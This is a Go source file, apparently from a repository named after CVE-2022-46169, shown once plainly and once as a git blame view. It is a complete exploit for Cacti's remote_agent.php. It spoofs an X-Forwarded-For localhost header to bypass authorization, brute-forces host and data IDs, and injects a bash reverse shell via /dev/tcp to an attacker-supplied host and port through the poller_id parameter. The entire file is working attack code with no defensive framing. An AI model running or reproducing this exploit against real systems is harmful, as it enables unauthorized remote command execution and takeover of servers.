cve-2022-46169/internal/exploiter/exploiter.go

package exploiter

import (
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"strings"
)

func checkVuln(vulnUrl string) bool {
	client := &http.Client{}
	req, err := http.NewRequest("GET", vulnUrl, nil)
	if err != nil {
		fmt.Println("Error creating request:", err)
		return false
	}
	req.Header.Set("X-Forwarded-For", "127.0.0.1")
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("Error making request:", err)
		return false
	}
	defer resp.Body.Close()

	if resp.StatusCode == 403 {
		return false
	}

	// read the response body for vulnerability check
	buf := new(strings.Builder)
	_, err = io.Copy(buf, resp.Body)
	if err != nil {
		fmt.Println("Error reading response body:", err)
		return false
	}

	if buf.String() == "FATAL: You are not authorized to use this service" {
		return false
	}

	return true
}

func bruteForcing(vulnURL string) (bool, int, int) {
	for n := 1; n <= 4; n++ {
		for n2 := 1; n2 <= 9; n2++ {
			idVulnURL := fmt.Sprintf("%s?action=polldata&poller_id=1&host_id=%d&local_data_ids[]=%d", vulnURL, n, n2)
			client := &http.Client{}
			req, err := http.NewRequest("GET", idVulnURL, nil)
			if err != nil {
				fmt.Println("Error creating request:", err)
				return false, 1, 1
			}
			req.Header.Set("X-Forwarded-For", "127.0.0.1")
			resp, err := client.Do(req)
			if err != nil {
				fmt.Println("Error making request:", err)
				return false, 1, 1
			}
			defer resp.Body.Close()

			buf := new(strings.Builder)
			_, err = io.Copy(buf, resp.Body)
			if err != nil {
				fmt.Println("Error reading response body:", err)
				return false, 1, 1
			}

			// perse the json response
			var jsonResponse []map[string]interface{}
			err = json.Unmarshal([]byte(buf.String()), &jsonResponse)
			if err != nil {
				fmt.Println("Error unmarshalling JSON:", err)
				return false, 1, 1
			}

			// the response must have at least one item
			if len(jsonResponse) > 0 {
				// first item, and the rrd_name field
				rrdName, exists := jsonResponse[0]["rrd_name"].(string)
				if exists && (rrdName == "polling_time" || rrdName == "uptime") {
					fmt.Println("Bruteforce Success")
					return true, n, n2
				}
			}
		}
	}
	fmt.Println("Unknown error occurred")
	return false, 1, 1
}

func reverseShell(payload string, vulnUrl string, hostID int, dataIDs int) {
	payloadEncoded := url.QueryEscape(payload)
	injectRequest := fmt.Sprintf("%s?action=polldata&poller_id=;%s&host_id=%d&local_data_ids[]=%d", vulnUrl, payloadEncoded, hostID, dataIDs)
	client := &http.Client{}
	req, err := http.NewRequest("GET", injectRequest, nil)
	if err != nil {
		fmt.Println("Error creating request:", err)
		return
	}
	req.Header.Set("X-Forwarded-For", "127.0.0.1")
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("Error making request:", err)
		return
	}

	resp.Body.Close()
}

func Exploit(urlTarget string, lhost string, lport string) {
	vulnURL := urlTarget + "/remote_agent.php"
	fmt.Println("Checking for vulnerability...")
	if checkVuln(vulnURL) {
		fmt.Println("The target is vulnerable. Bruteforcing...")

		fmt.Println("Bruteforcing the host_id and local_data_ids")
		isVuln, hostID, dataIDs := bruteForcing(vulnURL)

		if isVuln {
			payload := fmt.Sprintf("bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'", lhost, lport)
			reverseShell(payload, vulnURL, hostID, dataIDs)
		} else {
			fmt.Println("The bruteforce failed...")
		}
	} else {
		fmt.Println("The target is not vulnerable")
	}
}
added listener + subroutines 2025-01-24 11:01:46 +08:00			`package exploiter`

			`import (`
			`"encoding/json"`
			`"fmt"`
			`"io"`
			`"net/http"`
			`"net/url"`
			`"strings"`
			`)`

			`func checkVuln(vulnUrl string) bool {`
			`client := &http.Client{}`
			`req, err := http.NewRequest("GET", vulnUrl, nil)`
			`if err != nil {`
			`fmt.Println("Error creating request:", err)`
			`return false`
			`}`
			`req.Header.Set("X-Forwarded-For", "127.0.0.1")`
			`resp, err := client.Do(req)`
			`if err != nil {`
			`fmt.Println("Error making request:", err)`
			`return false`
			`}`
			`defer resp.Body.Close()`

			`if resp.StatusCode == 403 {`
			`return false`
			`}`

			`// read the response body for vulnerability check`
			`buf := new(strings.Builder)`
			`_, err = io.Copy(buf, resp.Body)`
			`if err != nil {`
			`fmt.Println("Error reading response body:", err)`
			`return false`
			`}`

			`if buf.String() == "FATAL: You are not authorized to use this service" {`
			`return false`
			`}`

			`return true`
			`}`

			`func bruteForcing(vulnURL string) (bool, int, int) {`
			`for n := 1; n <= 4; n++ {`
			`for n2 := 1; n2 <= 9; n2++ {`
			`idVulnURL := fmt.Sprintf("%s?action=polldata&poller_id=1&host_id=%d&local_data_ids[]=%d", vulnURL, n, n2)`
			`client := &http.Client{}`
			`req, err := http.NewRequest("GET", idVulnURL, nil)`
			`if err != nil {`
			`fmt.Println("Error creating request:", err)`
			`return false, 1, 1`
			`}`
			`req.Header.Set("X-Forwarded-For", "127.0.0.1")`
			`resp, err := client.Do(req)`
			`if err != nil {`
			`fmt.Println("Error making request:", err)`
			`return false, 1, 1`
			`}`
			`defer resp.Body.Close()`

			`buf := new(strings.Builder)`
			`_, err = io.Copy(buf, resp.Body)`
			`if err != nil {`
			`fmt.Println("Error reading response body:", err)`
			`return false, 1, 1`
			`}`

			`// perse the json response`
			`var jsonResponse []map[string]interface{}`
			`err = json.Unmarshal([]byte(buf.String()), &jsonResponse)`
			`if err != nil {`
			`fmt.Println("Error unmarshalling JSON:", err)`
			`return false, 1, 1`
			`}`

			`// the response must have at least one item`
			`if len(jsonResponse) > 0 {`
			`// first item, and the rrd_name field`
			`rrdName, exists := jsonResponse[0]["rrd_name"].(string)`
			`if exists && (rrdName == "polling_time" \|\| rrdName == "uptime") {`
			`fmt.Println("Bruteforce Success")`
			`return true, n, n2`
			`}`
			`}`
			`}`
			`}`
			`fmt.Println("Unknown error occurred")`
			`return false, 1, 1`
			`}`

			`func reverseShell(payload string, vulnUrl string, hostID int, dataIDs int) {`
			`payloadEncoded := url.QueryEscape(payload)`
			`injectRequest := fmt.Sprintf("%s?action=polldata&poller_id=;%s&host_id=%d&local_data_ids[]=%d", vulnUrl, payloadEncoded, hostID, dataIDs)`
			`client := &http.Client{}`
			`req, err := http.NewRequest("GET", injectRequest, nil)`
			`if err != nil {`
			`fmt.Println("Error creating request:", err)`
			`return`
			`}`
			`req.Header.Set("X-Forwarded-For", "127.0.0.1")`
			`resp, err := client.Do(req)`
			`if err != nil {`
			`fmt.Println("Error making request:", err)`
			`return`
			`}`
exit after exploit finishes 2025-01-24 11:40:04 +08:00
			`resp.Body.Close()`
added listener + subroutines 2025-01-24 11:01:46 +08:00			`}`

used a global flag system 2025-01-24 11:10:16 +08:00			`func Exploit(urlTarget string, lhost string, lport string) {`
added listener + subroutines 2025-01-24 11:01:46 +08:00			`vulnURL := urlTarget + "/remote_agent.php"`
fixed text outputs 2025-01-24 11:33:53 +08:00			`fmt.Println("Checking for vulnerability...")`
added listener + subroutines 2025-01-24 11:01:46 +08:00			`if checkVuln(vulnURL) {`
fixed text outputs 2025-01-24 11:33:53 +08:00			`fmt.Println("The target is vulnerable. Bruteforcing...")`
added listener + subroutines 2025-01-24 11:01:46 +08:00
			`fmt.Println("Bruteforcing the host_id and local_data_ids")`
			`isVuln, hostID, dataIDs := bruteForcing(vulnURL)`

			`if isVuln {`
			`payload := fmt.Sprintf("bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'", lhost, lport)`
			`reverseShell(payload, vulnURL, hostID, dataIDs)`
			`} else {`
fixed text outputs 2025-01-24 11:33:53 +08:00			`fmt.Println("The bruteforce failed...")`
added listener + subroutines 2025-01-24 11:01:46 +08:00			`}`
			`} else {`
			`fmt.Println("The target is not vulnerable")`
			`}`
			`}`